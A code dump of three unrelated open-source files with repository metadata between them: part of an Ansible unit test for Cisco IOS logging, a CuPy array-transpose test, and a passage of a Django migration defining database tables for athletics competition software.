# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from units.compat.mock import patch
from ansible.modules.network.ios import ios_logging
from units.modules.utils import set_module_args
from .ios_module import TestIosModule, load_fixture
class TestIosLoggingModule(TestIosModule):
module = ios_logging
def setUp(self):
super(TestIosLoggingModule, self).setUp()
self.mock_get_config = patch('ansible.modules.network.ios.ios_logging.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.ios.ios_logging.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_capabilities = patch('ansible.modules.network.ios.ios_logging.get_capabilities')
self.get_capabilities = self.mock_get_capabilities.start()
self.get_capabilities.return_value = {'device_info': {'network_os_version': '15.6(2)T'}}
def tearDown(self):
super(TestIosLoggingModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
self.mock_get_capabilities.stop()
def load_fixtures(self, commands=None):
self.get_config.return_value = load_fixture('ios_logging_config.cfg')
self.load_config.return_value = None
def test_ios_logging_buffer_size_changed_implicit(self):
set_module_args(dict(dest='buffered'))
commands = ['logging buffered 4096']
self.execute_module(changed=True, commands=commands)
def test_ios_logging_buffer_size_changed_explicit(self):
set_module_args(dict(dest='buffered', size=6000))
commands = ['logging buffered 6000']
self.execute_module(changed=True, commands=commands)
|
gpl-3.0
|
muupan/chainer
|
tests/cupy_tests/manipulation_tests/test_transpose.py
|
2
|
1416
|
import unittest
import cupy
from cupy import testing
@testing.gpu
class TestTranspose(unittest.TestCase):
_multiprocess_can_split_ = True
@testing.numpy_cupy_array_equal()
def test_rollaxis(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return xp.rollaxis(a, 2)
def test_rollaxis_failure(self):
a = testing.shaped_arange((2, 3, 4))
with self.assertRaises(ValueError):
cupy.rollaxis(a, 3)
@testing.numpy_cupy_array_equal()
def test_swapaxes(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return xp.swapaxes(a, 2, 0)
def test_swapaxes_failure(self):
a = testing.shaped_arange((2, 3, 4))
with self.assertRaises(ValueError):
cupy.swapaxes(a, 3, 0)
@testing.numpy_cupy_array_equal()
def test_transpose(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return a.transpose(-1, 0, 1)
@testing.numpy_cupy_array_equal()
def test_transpose_empty(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return a.transpose()
@testing.numpy_cupy_array_equal()
def test_external_transpose(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return xp.transpose(a)
@testing.numpy_cupy_array_equal()
def test_transpose_none(self, xp):
a = testing.shaped_arange((2, 3, 4), xp)
return a.transpose(None)
|
mit
|
ppoile/athletica-adapter
|
main/migrations/0001_squashed_0005_auto_20150304_0020.py
|
1
|
44968
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
replaces = [(b'main', '0001_initial'), (b'main', '0002_auto_20150303_1207'), (b'main', '0003_auto_20150303_1321'), (b'main', '0004_auto_20150303_1413'), (b'main', '0005_auto_20150304_0020')]
dependencies = [
]
operations = [
migrations.CreateModel(
name='Anlage',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xAnlage')),
('bezeichnung', models.CharField(max_length=20, db_column='Bezeichnung')),
('homologiert', models.CharField(default='y', max_length=1, db_column='Homologiert', choices=[('y', 'Yes'), ('n', 'No')])),
],
options={
'ordering': ['bezeichnung'],
'db_table': 'anlage',
'verbose_name_plural': 'anlagen',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Anmeldung',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xAnmeldung')),
('startnummer', models.IntegerField(db_column='Startnummer')),
('erstserie', models.CharField(max_length=1, db_column='Erstserie')),
('bezahlt', models.CharField(max_length=1, db_column='Bezahlt')),
('gruppe', models.CharField(max_length=2, db_column='Gruppe')),
('bestleistungmk', models.FloatField(db_column='BestleistungMK')),
('vereinsinfo', models.CharField(max_length=150, db_column='Vereinsinfo')),
('xteam', models.IntegerField(db_column='xTeam')),
('baseeffortmk', models.CharField(max_length=1, db_column='BaseEffortMK')),
('anmeldenr_zlv', models.IntegerField(null=True, db_column='Anmeldenr_ZLV', blank=True)),
('kidid', models.IntegerField(null=True, db_column='KidID', blank=True)),
('angemeldet', models.CharField(max_length=1, db_column='Angemeldet', blank=True)),
('vorjahrleistungmk', models.IntegerField(null=True, db_column='VorjahrLeistungMK', blank=True)),
],
options={
'db_table': 'anmeldung',
'verbose_name_plural': 'anmeldungen',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Athlet',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xAthlet')),
('name', models.CharField(max_length=50, db_column='Name')),
('vorname', models.CharField(max_length=50, db_column='Vorname')),
('jahrgang', models.IntegerField(db_column='Jahrgang', blank=True)),
('xverein2', models.IntegerField(db_column='xVerein2')),
('lizenznummer', models.IntegerField(db_column='Lizenznummer')),
('geschlecht', models.CharField(max_length=1, db_column='Geschlecht', choices=[('m', 'M\xe4nnlich'), ('w', 'Weiblich')])),
('land', models.CharField(max_length=3, db_column='Land')),
('geburtstag', models.DateField(null=True, db_column='Geburtstag')),
('athleticagen', models.CharField(max_length=1, db_column='Athleticagen')),
('bezahlt', models.CharField(max_length=1, db_column='Bezahlt')),
('xregion', models.IntegerField(db_column='xRegion')),
('lizenztyp', models.IntegerField(db_column='Lizenztyp')),
('manuell', models.IntegerField(db_column='Manuell')),
('adresse', models.CharField(max_length=50, db_column='Adresse', blank=True)),
('plz', models.IntegerField(null=True, db_column='Plz', blank=True)),
('ort', models.CharField(max_length=50, db_column='Ort', blank=True)),
('email', models.CharField(max_length=50, db_column='Email', blank=True)),
],
options={
'db_table': 'athlet',
'verbose_name_plural': 'athleten',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anmeldung',
name='athlet',
field=models.ForeignKey(related_name='anmeldungen', db_column='xAthlet', to='main.Athlet'),
preserve_default=True,
),
migrations.CreateModel(
name='BaseAccount',
fields=[
('account_code', models.CharField(max_length=30, serialize=False, primary_key=True)),
('account_name', models.CharField(max_length=255)),
('account_short', models.CharField(max_length=255)),
('account_type', models.CharField(max_length=100)),
('lg', models.CharField(max_length=100)),
],
options={
'db_table': 'base_account',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseAthlete',
fields=[
('id_athlete', models.AutoField(serialize=False, primary_key=True)),
('license', models.IntegerField()),
('license_paid', models.CharField(max_length=1)),
('license_cat', models.CharField(max_length=4)),
('lastname', models.CharField(max_length=100)),
('firstname', models.CharField(max_length=100)),
('sex', models.CharField(max_length=1)),
('nationality', models.CharField(max_length=3)),
('account_code', models.CharField(max_length=30)),
('second_account_code', models.CharField(max_length=30)),
('birth_date', models.DateField(null=True)),
('account_info', models.CharField(max_length=150)),
],
options={
'db_table': 'base_athlete',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseLog',
fields=[
('id_log', models.AutoField(serialize=False, primary_key=True)),
('type', models.CharField(max_length=50)),
('update_time', models.DateTimeField()),
('global_last_change', models.DateField()),
],
options={
'db_table': 'base_log',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BasePerformance',
fields=[
('id_performance', models.AutoField(serialize=False, primary_key=True)),
('id_athlete', models.IntegerField()),
('discipline', models.IntegerField()),
('category', models.CharField(max_length=10)),
('best_effort', models.CharField(max_length=15)),
('best_effort_date', models.DateField(null=True)),
('best_effort_event', models.CharField(max_length=100)),
('season_effort', models.CharField(max_length=15)),
('season_effort_date', models.DateField(null=True)),
('season_effort_event', models.CharField(max_length=100)),
('notification_effort', models.CharField(max_length=15)),
('notification_effort_date', models.DateField(null=True)),
('notification_effort_event', models.CharField(max_length=100)),
('season', models.CharField(max_length=1)),
],
options={
'db_table': 'base_performance',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseRelay',
fields=[
('id_relay', models.AutoField(serialize=False, primary_key=True)),
('is_athletica_gen', models.CharField(max_length=1)),
('relay_name', models.CharField(max_length=255)),
('category', models.CharField(max_length=10)),
('discipline', models.CharField(max_length=10)),
('account_code', models.IntegerField()),
],
options={
'db_table': 'base_relay',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='BaseSvm',
fields=[
('id_svm', models.AutoField(serialize=False, primary_key=True)),
('is_athletica_gen', models.CharField(max_length=1)),
('svm_name', models.CharField(max_length=255)),
('svm_category', models.CharField(max_length=10)),
('account_code', models.IntegerField()),
],
options={
'db_table': 'base_svm',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DisziplinDe',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xDisziplin')),
('kurzname', models.CharField(unique=True, max_length=15, db_column='Kurzname')),
('name', models.CharField(max_length=40, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('seriegroesse', models.IntegerField(db_column='Seriegroesse')),
('staffellaeufer', models.IntegerField(null=True, db_column='Staffellaeufer', blank=True)),
('typ', models.IntegerField(db_column='Typ')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('strecke', models.FloatField(db_column='Strecke')),
('code', models.IntegerField(db_column='Code')),
('xomega_typ', models.IntegerField(db_column='xOMEGA_Typ')),
('aktiv', models.CharField(max_length=1)),
],
options={
'db_table': 'disziplin_de',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DisziplinFr',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xDisziplin')),
('kurzname', models.CharField(unique=True, max_length=15, db_column='Kurzname')),
('name', models.CharField(max_length=40, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('seriegroesse', models.IntegerField(db_column='Seriegroesse')),
('staffellaeufer', models.IntegerField(null=True, db_column='Staffellaeufer', blank=True)),
('typ', models.IntegerField(db_column='Typ')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('strecke', models.FloatField(db_column='Strecke')),
('code', models.IntegerField(db_column='Code')),
('xomega_typ', models.IntegerField(db_column='xOMEGA_Typ')),
('aktiv', models.CharField(max_length=1)),
],
options={
'db_table': 'disziplin_fr',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DisziplinIt',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xDisziplin')),
('kurzname', models.CharField(unique=True, max_length=15, db_column='Kurzname')),
('name', models.CharField(max_length=40, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('seriegroesse', models.IntegerField(db_column='Seriegroesse')),
('staffellaeufer', models.IntegerField(null=True, db_column='Staffellaeufer', blank=True)),
('typ', models.IntegerField(db_column='Typ')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('strecke', models.FloatField(db_column='Strecke')),
('code', models.IntegerField(db_column='Code')),
('xomega_typ', models.IntegerField(db_column='xOMEGA_Typ')),
('aktiv', models.CharField(max_length=1)),
],
options={
'db_table': 'disziplin_it',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Faq',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xFaq')),
('frage', models.CharField(max_length=255, db_column='Frage')),
('antwort', models.TextField(db_column='Antwort')),
('zeigen', models.CharField(max_length=1, db_column='Zeigen')),
('postop', models.IntegerField(db_column='PosTop')),
('posleft', models.IntegerField(db_column='PosLeft')),
('height', models.IntegerField()),
('width', models.IntegerField()),
('seite', models.CharField(max_length=255, db_column='Seite')),
('sprache', models.CharField(max_length=2, db_column='Sprache')),
('farbetitel', models.CharField(max_length=6, db_column='FarbeTitel')),
('farbehg', models.CharField(max_length=6, db_column='FarbeHG')),
],
options={
'db_table': 'faq',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Hoehe',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xHoehe')),
('hoehe', models.IntegerField(db_column='Hoehe')),
('xrunde', models.IntegerField(db_column='xRunde')),
('xserie', models.IntegerField(db_column='xSerie')),
],
options={
'db_table': 'hoehe',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Kategorie',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xKategorie')),
('kurzname', models.CharField(unique=True, max_length=4, db_column='Kurzname')),
('name', models.CharField(max_length=30, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('alterslimite', models.IntegerField(db_column='Alterslimite')),
('code', models.CharField(max_length=4, db_column='Code')),
('geschlecht', models.CharField(max_length=1, db_column='Geschlecht')),
('aktiv', models.CharField(max_length=1)),
('ukc', models.CharField(max_length=1, db_column='UKC', blank=True)),
],
options={
'db_table': 'kategorie',
'verbose_name_plural': 'kategorien',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anmeldung',
name='kategorie',
field=models.ForeignKey(related_name='-', db_column='xKategorie', to='main.Kategorie'),
preserve_default=True,
),
migrations.CreateModel(
name='KategorieSvm',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xKategorie_svm')),
('name', models.CharField(max_length=100, db_column='Name')),
('code', models.CharField(max_length=5, db_column='Code')),
],
options={
'db_table': 'kategorie_svm',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Land',
fields=[
('xcode', models.CharField(max_length=3, serialize=False, primary_key=True, db_column='xCode')),
('name', models.CharField(max_length=100, db_column='Name')),
('sortierwert', models.IntegerField(db_column='Sortierwert')),
],
options={
'db_table': 'land',
'verbose_name_plural': 'l\xe4nder',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Layout',
fields=[
('xlayout', models.IntegerField(serialize=False, primary_key=True, db_column='xLayout')),
('typtl', models.IntegerField(db_column='TypTL')),
('texttl', models.CharField(max_length=255, db_column='TextTL')),
('bildtl', models.CharField(max_length=255, db_column='BildTL')),
('typtc', models.IntegerField(db_column='TypTC')),
('texttc', models.CharField(max_length=255, db_column='TextTC')),
('bildtc', models.CharField(max_length=255, db_column='BildTC')),
('typtr', models.IntegerField(db_column='TypTR')),
('texttr', models.CharField(max_length=255, db_column='TextTR')),
('bildtr', models.CharField(max_length=255, db_column='BildTR')),
('typbl', models.IntegerField(db_column='TypBL')),
('textbl', models.CharField(max_length=255, db_column='TextBL')),
('bildbl', models.CharField(max_length=255, db_column='BildBL')),
('typbc', models.IntegerField(db_column='TypBC')),
('textbc', models.CharField(max_length=255, db_column='TextBC')),
('bildbc', models.CharField(max_length=255, db_column='BildBC')),
('typbr', models.IntegerField(db_column='TypBR')),
('textbr', models.CharField(max_length=255, db_column='TextBR')),
('bildbr', models.CharField(max_length=255, db_column='BildBR')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
],
options={
'db_table': 'layout',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Meeting',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xMeeting')),
('name', models.CharField(max_length=60, null=True, db_column='Name')),
('ort', models.CharField(max_length=20, db_column='Ort')),
('datumvon', models.DateField(default=datetime.date(2015, 3, 3), db_column='DatumVon')),
('datumbis', models.DateField(null=True, db_column='DatumBis', blank=True)),
('nummer', models.CharField(default='', max_length=20, db_column='Nummer')),
('programmmodus', models.IntegerField(default=0, db_column='ProgrammModus', choices=[(0, 'Wettkampfb\xfcro'), (1, 'dezentral'), (2, 'dezentral mit Rangierung')])),
('online', models.CharField(default='n', max_length=1, db_column='Online', choices=[('y', True), ('n', False)])),
('organisator', models.CharField(max_length=200, db_column='Organisator')),
('zeitmessung', models.CharField(max_length=5, db_column='Zeitmessung')),
('passwort', models.CharField(max_length=50, db_column='Passwort')),
('xcontrol', models.IntegerField(default=0, db_column='xControl')),
('startgeld', models.FloatField(default=0, db_column='Startgeld')),
('startgeldreduktion', models.FloatField(default=0, db_column='StartgeldReduktion')),
('haftgeld', models.FloatField(default=0, db_column='Haftgeld')),
('saison', models.CharField(default='O', max_length=1, db_column='Saison', choices=[('I', 'Indoor'), ('O', 'Outdoor')])),
('autorangieren', models.CharField(max_length=1, db_column='AutoRangieren')),
('UBSKidsCup', models.CharField(default='n', max_length=1, db_column='UKC', choices=[('y', True), ('n', False)])),
('statuschanged', models.CharField(max_length=1, db_column='StatusChanged')),
],
options={
'db_table': 'meeting',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anmeldung',
name='meeting',
field=models.ForeignKey(related_name='anmeldungen', db_column='xMeeting', to='main.Meeting'),
preserve_default=True,
),
migrations.CreateModel(
name='OmegaTyp',
fields=[
('xomega_typ', models.IntegerField(serialize=False, primary_key=True, db_column='xOMEGA_Typ')),
('omega_name', models.CharField(max_length=15, db_column='OMEGA_Name')),
('omega_kurzname', models.CharField(max_length=4, db_column='OMEGA_Kurzname')),
],
options={
'db_table': 'omega_typ',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRegion')),
('name', models.CharField(max_length=50, db_column='Name')),
('anzeige', models.CharField(max_length=6, db_column='Anzeige')),
('sortierwert', models.IntegerField(db_column='Sortierwert')),
('ukc', models.CharField(max_length=1, db_column='UKC', blank=True)),
],
options={
'db_table': 'region',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Resultat',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xResultat')),
('leistung', models.IntegerField(db_column='Leistung')),
('info', models.CharField(max_length=5, db_column='Info')),
('punkte', models.FloatField(db_column='Punkte')),
],
options={
'db_table': 'resultat',
'verbose_name_plural': 'resultate',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Runde',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRunde')),
('datum', models.DateField(db_column='Datum')),
('startzeit', models.TimeField(db_column='Startzeit')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('status', models.IntegerField(db_column='Status')),
('speakerstatus', models.IntegerField(db_column='Speakerstatus')),
('statuszeitmessung', models.IntegerField(db_column='StatusZeitmessung')),
('statusupload', models.IntegerField(db_column='StatusUpload')),
('qualifikationsieger', models.IntegerField(db_column='QualifikationSieger')),
('qualifikationleistung', models.IntegerField(db_column='QualifikationLeistung')),
('bahnen', models.IntegerField(db_column='Bahnen')),
('versuche', models.IntegerField(db_column='Versuche')),
('gruppe', models.CharField(max_length=2, db_column='Gruppe')),
('xrundentyp', models.IntegerField(null=True, db_column='xRundentyp', blank=True)),
('nurbestesresultat', models.CharField(max_length=1, db_column='nurBestesResultat')),
('statuschanged', models.CharField(max_length=1, db_column='StatusChanged')),
('endkampf', models.CharField(max_length=1, db_column='Endkampf')),
('finalisten', models.IntegerField(null=True, db_column='Finalisten', blank=True)),
('finalnach', models.IntegerField(null=True, db_column='FinalNach', blank=True)),
('drehen', models.CharField(max_length=20, db_column='Drehen', blank=True)),
('statusuploadukc', models.IntegerField(null=True, db_column='StatusUploadUKC', blank=True)),
],
options={
'db_table': 'runde',
'verbose_name_plural': 'runden',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Rundenlog',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundenlog')),
('zeit', models.DateTimeField(db_column='Zeit')),
('ereignis', models.CharField(max_length=255, db_column='Ereignis')),
('runde', models.ForeignKey(related_name='rundenlog', db_column='xRunde', to='main.Runde')),
],
options={
'db_table': 'rundenlog',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Rundenset',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('hauptrunde', models.IntegerField(default=0, db_column='Hauptrunde', choices=[(1, True), (0, False)])),
('runde', models.ForeignKey(related_name='-', db_column='xRunde', to='main.Runde')),
('meeting', models.ForeignKey(to='main.Meeting', db_column='xMeeting')),
('rundenset', models.IntegerField(default=0, db_column='xRundenset')),
],
options={
'db_table': 'rundenset',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RundentypDe',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundentyp')),
('typ', models.CharField(unique=True, max_length=2, db_column='Typ')),
('name', models.CharField(unique=True, max_length=20, db_column='Name')),
('wertung', models.IntegerField(null=True, db_column='Wertung', blank=True)),
('code', models.CharField(max_length=2, db_column='Code')),
],
options={
'db_table': 'rundentyp_de',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RundentypFr',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundentyp')),
('typ', models.CharField(unique=True, max_length=2, db_column='Typ')),
('name', models.CharField(unique=True, max_length=20, db_column='Name')),
('wertung', models.IntegerField(null=True, db_column='Wertung', blank=True)),
('code', models.CharField(max_length=2, db_column='Code')),
],
options={
'db_table': 'rundentyp_fr',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RundentypIt',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundentyp')),
('typ', models.CharField(unique=True, max_length=2, db_column='Typ')),
('name', models.CharField(unique=True, max_length=20, db_column='Name')),
('wertung', models.IntegerField(null=True, db_column='Wertung', blank=True)),
('code', models.CharField(max_length=2, db_column='Code')),
],
options={
'db_table': 'rundentyp_it',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Serie',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xSerie')),
('bezeichnung', models.CharField(max_length=2, db_column='Bezeichnung')),
('wind', models.CharField(max_length=5, db_column='Wind', blank=True)),
('film', models.IntegerField(null=True, db_column='Film', blank=True)),
('status', models.IntegerField(db_column='Status')),
('handgestoppt', models.IntegerField(db_column='Handgestoppt')),
('tvname', models.CharField(max_length=70, db_column='TVName', blank=True)),
('maxathlet', models.IntegerField(db_column='MaxAthlet')),
('runde', models.ForeignKey(related_name='serien', db_column='xRunde', to='main.Runde')),
('anlage', models.ForeignKey(db_column='xAnlage', blank=True, to='main.Anlage', null=True)),
],
options={
'db_table': 'serie',
'verbose_name_plural': 'serien',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Serienstart',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xSerienstart')),
('position', models.IntegerField(db_column='Position')),
('bahn', models.IntegerField(db_column='Bahn')),
('rang', models.IntegerField(db_column='Rang')),
('qualifikation', models.IntegerField(db_column='Qualifikation')),
('rundezusammen', models.IntegerField(db_column='RundeZusammen')),
('bemerkung', models.CharField(max_length=5, db_column='Bemerkung')),
('position2', models.IntegerField(db_column='Position2')),
('position3', models.IntegerField(db_column='Position3')),
('aktivathlet', models.CharField(max_length=1, db_column='AktivAthlet')),
('starthoehe', models.IntegerField(null=True, db_column='Starthoehe', blank=True)),
('serie', models.ForeignKey(related_name='serienstarts', db_column='xSerie', to='main.Serie')),
],
options={
'db_table': 'serienstart',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='resultat',
name='serienstart',
field=models.ForeignKey(related_name='resultate', db_column='xSerienstart', to='main.Serienstart'),
preserve_default=True,
),
migrations.CreateModel(
name='Stadion',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xStadion')),
('name', models.CharField(max_length=50, db_column='Name')),
('bahnen', models.IntegerField(default=6, db_column='Bahnen')),
('bahnengerade', models.IntegerField(default=6, db_column='BahnenGerade')),
('ueber1000m', models.CharField(default='n', max_length=1, db_column='Ueber1000m', choices=[('y', True), ('n', False)])),
('halle', models.CharField(default='n', max_length=1, db_column='Halle', choices=[('y', True), ('n', False)])),
],
options={
'db_table': 'stadion',
'verbose_name_plural': 'stadien',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anlage',
name='stadion',
field=models.ForeignKey(related_name='anlagen', db_column='xStadion', to='main.Stadion'),
preserve_default=True,
),
migrations.AddField(
model_name='meeting',
name='stadion',
field=models.ForeignKey(related_name='meetings', db_column='xStadion', to='main.Stadion'),
preserve_default=True,
),
migrations.CreateModel(
name='Staffel',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xStaffel')),
('name', models.CharField(max_length=40, db_column='Name')),
('xverein', models.IntegerField(db_column='xVerein')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('xkategorie', models.IntegerField(db_column='xKategorie')),
('xteam', models.IntegerField(db_column='xTeam')),
('athleticagen', models.CharField(max_length=1, db_column='Athleticagen')),
('startnummer', models.IntegerField(db_column='Startnummer')),
],
options={
'db_table': 'staffel',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Staffelathlet',
fields=[
('xstaffelstart', models.IntegerField(serialize=False, primary_key=True, db_column='xStaffelstart')),
('xathletenstart', models.IntegerField(db_column='xAthletenstart')),
('xrunde', models.IntegerField(db_column='xRunde')),
('position', models.IntegerField(db_column='Position')),
],
options={
'db_table': 'staffelathlet',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Start',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xStart')),
('anwesend', models.IntegerField(db_column='Anwesend')),
('bestleistung', models.IntegerField(db_column='Bestleistung')),
('bezahlt', models.CharField(max_length=1, db_column='Bezahlt')),
('erstserie', models.CharField(max_length=1, db_column='Erstserie')),
('baseeffort', models.CharField(max_length=1, db_column='BaseEffort')),
('vorjahrleistung', models.IntegerField(null=True, db_column='VorjahrLeistung', blank=True)),
('gruppe', models.CharField(max_length=2, db_column='Gruppe', blank=True)),
('staffel', models.ForeignKey(db_column='xStaffel', blank=True, to='main.Staffel', null=True)),
('anmeldung', models.ForeignKey(related_name='starts', db_column='xAnmeldung', to='main.Anmeldung')),
],
options={
'db_table': 'start',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='serienstart',
name='start',
field=models.ForeignKey(related_name='serienstart', db_column='xStart', to='main.Start'),
preserve_default=True,
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xTeam')),
('name', models.CharField(max_length=30, db_column='Name')),
('athleticagen', models.CharField(max_length=1, db_column='Athleticagen')),
('xkategorie', models.IntegerField(db_column='xKategorie')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('xverein', models.IntegerField(db_column='xVerein')),
('xkategorie_svm', models.IntegerField(db_column='xKategorie_svm')),
],
options={
'db_table': 'team',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Teamsm',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xTeamsm')),
('name', models.CharField(max_length=100, db_column='Name')),
('xkategorie', models.IntegerField(db_column='xKategorie')),
('xverein', models.IntegerField(db_column='xVerein')),
('xwettkampf', models.IntegerField(db_column='xWettkampf')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('startnummer', models.IntegerField(db_column='Startnummer')),
('gruppe', models.CharField(max_length=2, db_column='Gruppe', blank=True)),
('quali', models.IntegerField(db_column='Quali')),
('leistung', models.IntegerField(db_column='Leistung')),
],
options={
'db_table': 'teamsm',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Teamsmathlet',
fields=[
('xteamsm', models.IntegerField(serialize=False, primary_key=True, db_column='xTeamsm')),
('xanmeldung', models.IntegerField(db_column='xAnmeldung')),
],
options={
'db_table': 'teamsmathlet',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Verein',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xVerein')),
('name', models.CharField(unique=True, max_length=100, db_column='Name')),
('sortierwert', models.CharField(max_length=100, db_column='Sortierwert')),
('xcode', models.CharField(max_length=30, db_column='xCode')),
('geloescht', models.IntegerField(db_column='Geloescht')),
],
options={
'db_table': 'verein',
'verbose_name_plural': 'vereine',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='athlet',
name='verein',
field=models.ForeignKey(related_name='athleten', db_column='xVerein', to='main.Verein'),
preserve_default=True,
),
migrations.CreateModel(
name='Videowand',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xVideowand')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('x', models.IntegerField(db_column='X')),
('y', models.IntegerField(db_column='Y')),
('inhaltart', models.CharField(max_length=4, db_column='InhaltArt')),
('inhaltstatisch', models.TextField(db_column='InhaltStatisch')),
('inhaltdynamisch', models.TextField(db_column='InhaltDynamisch')),
('aktualisierung', models.IntegerField(db_column='Aktualisierung')),
('status', models.CharField(max_length=6, db_column='Status')),
('hintergrund', models.CharField(max_length=6, db_column='Hintergrund')),
('fordergrund', models.CharField(max_length=6, db_column='Fordergrund')),
('bildnr', models.IntegerField(db_column='Bildnr')),
],
options={
'db_table': 'videowand',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Wertungstabelle',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xWertungstabelle')),
('name', models.CharField(max_length=255, db_column='Name')),
],
options={
'db_table': 'wertungstabelle',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='WertungstabellePunkte',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xWertungstabelle_Punkte')),
('xwertungstabelle', models.IntegerField(db_column='xWertungstabelle')),
('xdisziplin', models.IntegerField(db_column='xDisziplin')),
('geschlecht', models.CharField(max_length=1, db_column='Geschlecht')),
('leistung', models.CharField(max_length=50, db_column='Leistung')),
('punkte', models.FloatField(db_column='Punkte')),
],
options={
'db_table': 'wertungstabelle_punkte',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Wettkampf',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xWettkampf')),
('typ', models.IntegerField(db_column='Typ', choices=[(0, 'Einzel'), (1, 'Mehrkampf')])),
('haftgeld', models.FloatField(db_column='Haftgeld')),
